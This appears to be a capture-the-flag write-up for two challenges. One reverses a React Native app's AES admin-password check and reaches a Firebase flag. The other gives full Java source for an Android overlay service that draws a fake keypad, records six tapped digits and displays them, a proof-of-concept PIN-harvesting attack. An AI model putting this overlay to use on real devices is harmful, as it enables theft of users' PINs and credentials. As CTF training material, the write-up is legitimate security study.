CrackMe

Author: sahuang
Category: Reverse
Points: 100
Solves: 187

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
if ('admin@sekai.team' !== t.state.email || false === e.validatePassword(t.state.password)) console.log('Not an admin account.');
        else console.log('You are an admin...This could be useful.');
        var s = module488.getAuth(n);
        module488
          .signInWithEmailAndPassword(s, t.state.email, t.state.password)
          .then(function (e) {
            t.setState({
              verifying: false,
            });
            var n = module486.ref(o, 'users/' + e.user.uid + '/flag');
            module486.onValue(n, function () {
              t.setState({
                verifying: false,
              });
              t.setState({
                errorTitle: 'Hello Admin',
                errorMessage: "Keep digging, you're almost there!",
              });
              t.AlertPro.open();
            });
          })
          
  e.validatePassword = function (e) {
      if (17 !== e.length) return false;
      var t = module700.default.enc.Utf8.parse(module456.default.KEY),
        n = module700.default.enc.Utf8.parse(module456.default.IV);
      return (
        '03afaa672ff078c63d5bdb0ea08be12b09ea53ea822cd2acef36da5b279b9524' ===
        module700.default.AES.encrypt(e, t, {
          iv: n,
        }).ciphertext.toString(module700.default.enc.Hex)
      );
    };

Crackme1.png

Crackme3.png

Flag: SEKAI{15_React_N@71v3_R3v3rs3_H@RD???}

Hijacker

Author: Marc
Category: Misc
Points: 326
Solves: 13

Here is the Overlay src code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
public class Overlay extends Service implements View.OnTouchListener, View.OnClickListener {

    WindowManager w;
    View overlayView;
    int count = 0;
    private TextView textView;
    private StringBuilder sb = new StringBuilder();

    @Nullable
    @Override
    public IBinder onBind(Intent intent) {
        return null;
    }

    @Override
    public void onClick(View view) {}

    @Override
    public boolean onTouch(View view, MotionEvent motionEvent) {
        return true;
    }

    @RequiresApi(api = Build.VERSION_CODES.O)
    @Override
    public void onCreate() {
        super.onCreate();

        if (!Settings.canDrawOverlays(this)) {
            Intent intent = new Intent(Settings.ACTION_MANAGE_OVERLAY_PERMISSION,
                    Uri.parse("package:" + getPackageName()));
            intent.addFlags(Intent.FLAG_ACTIVITY_NEW_TASK);
            startActivity(intent);
            Toast.makeText(this, "Please grant overlay permission", Toast.LENGTH_LONG).show();
            stopSelf();
            return;
        }

        w = (WindowManager) getSystemService(Context.WINDOW_SERVICE);

        overlayView = LayoutInflater.from(this).inflate(R.layout.custom, null);

        overlayView.setOnTouchListener(this);

        WindowManager.LayoutParams params = new WindowManager.LayoutParams(
                WindowManager.LayoutParams.WRAP_CONTENT,
                WindowManager.LayoutParams.WRAP_CONTENT,
                WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,
                WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE,
                PixelFormat.TRANSLUCENT
        );

        Button btn1 = overlayView.findViewById(R.id.btn1);
        Button btn2 = overlayView.findViewById(R.id.btn2);
        Button btn3 = overlayView.findViewById(R.id.btn3);
        Button btn4 = overlayView.findViewById(R.id.btn4);
        Button btn5 = overlayView.findViewById(R.id.btn5);
        Button btn6 = overlayView.findViewById(R.id.btn6);
        Button btn7 = overlayView.findViewById(R.id.btn7);
        Button btn8 = overlayView.findViewById(R.id.btn8);
        Button btn9 = overlayView.findViewById(R.id.btn9);
        Button btn0 = overlayView.findViewById(R.id.btn0);
        Button btnClear = overlayView.findViewById(R.id.btn_clear);

        btn1.setOnClickListener(this);
        btn2.setOnClickListener(this);
        btn3.setOnClickListener(this);
        btn4.setOnClickListener(this);
        btn5.setOnClickListener(this);
        btn6.setOnClickListener(this);
        btn7.setOnClickListener(this);
        btn8.setOnClickListener(this);
        btn9.setOnClickListener(this);
        btn0.setOnClickListener(this);
        btnClear.setOnClickListener(this);

        textView = new TextView(this);
        textView.setTextColor(Color.WHITE);
        textView.setTextSize(18);
        textView.setBackgroundColor(Color.BLACK);
        textView.setPadding(20, 20, 20, 20);
        textView.setGravity(Gravity.CENTER);

        WindowManager.LayoutParams textViewParams = new WindowManager.LayoutParams(
                WindowManager.LayoutParams.WRAP_CONTENT,
                WindowManager.LayoutParams.WRAP_CONTENT,
                WindowManager.LayoutParams.TYPE_APPLICATION_OVERLAY,
                WindowManager.LayoutParams.FLAG_NOT_FOCUSABLE,
                PixelFormat.TRANSLUCENT
        );

        textViewParams.gravity = Gravity.TOP | Gravity.CENTER_HORIZONTAL;

        btn1.setOnClickListener(view -> handleButtonClick("1", textViewParams));
        btn2.setOnClickListener(view -> handleButtonClick("2", textViewParams));
        btn3.setOnClickListener(view -> handleButtonClick("3", textViewParams));
        btn4.setOnClickListener(view -> handleButtonClick("4", textViewParams));
        btn5.setOnClickListener(view -> handleButtonClick("5", textViewParams));
        btn6.setOnClickListener(view -> handleButtonClick("6", textViewParams));
        btn7.setOnClickListener(view -> handleButtonClick("7", textViewParams));
        btn8.setOnClickListener(view -> handleButtonClick("8", textViewParams));
        btn9.setOnClickListener(view -> handleButtonClick("9", textViewParams));
        btn0.setOnClickListener(view -> handleButtonClick("0", textViewParams));
        btnClear.setOnClickListener(view -> handleButtonClick("C", textViewParams));

        w.addView(overlayView, params);
    }

    private void handleButtonClick(String input, WindowManager.LayoutParams textViewParams) {
        sb.append(input);
        count++;
        if (count == 6) {
            textView.setText(sb.toString());
            w.addView(textView, textViewParams);
        }
    }

    @Override
    public void onDestroy() {
        super.onDestroy();
        if (overlayView != null) {
            w.removeView(overlayView);
        }
        if (textView != null) {
            w.removeView(textView);
        }
    }
}

Screenshot of the POC Tester

secure_app_1.png

secure_app_2.png

Flag: SEKAI{Ev3ry_K3yb0ard_1s_Ins3cur3}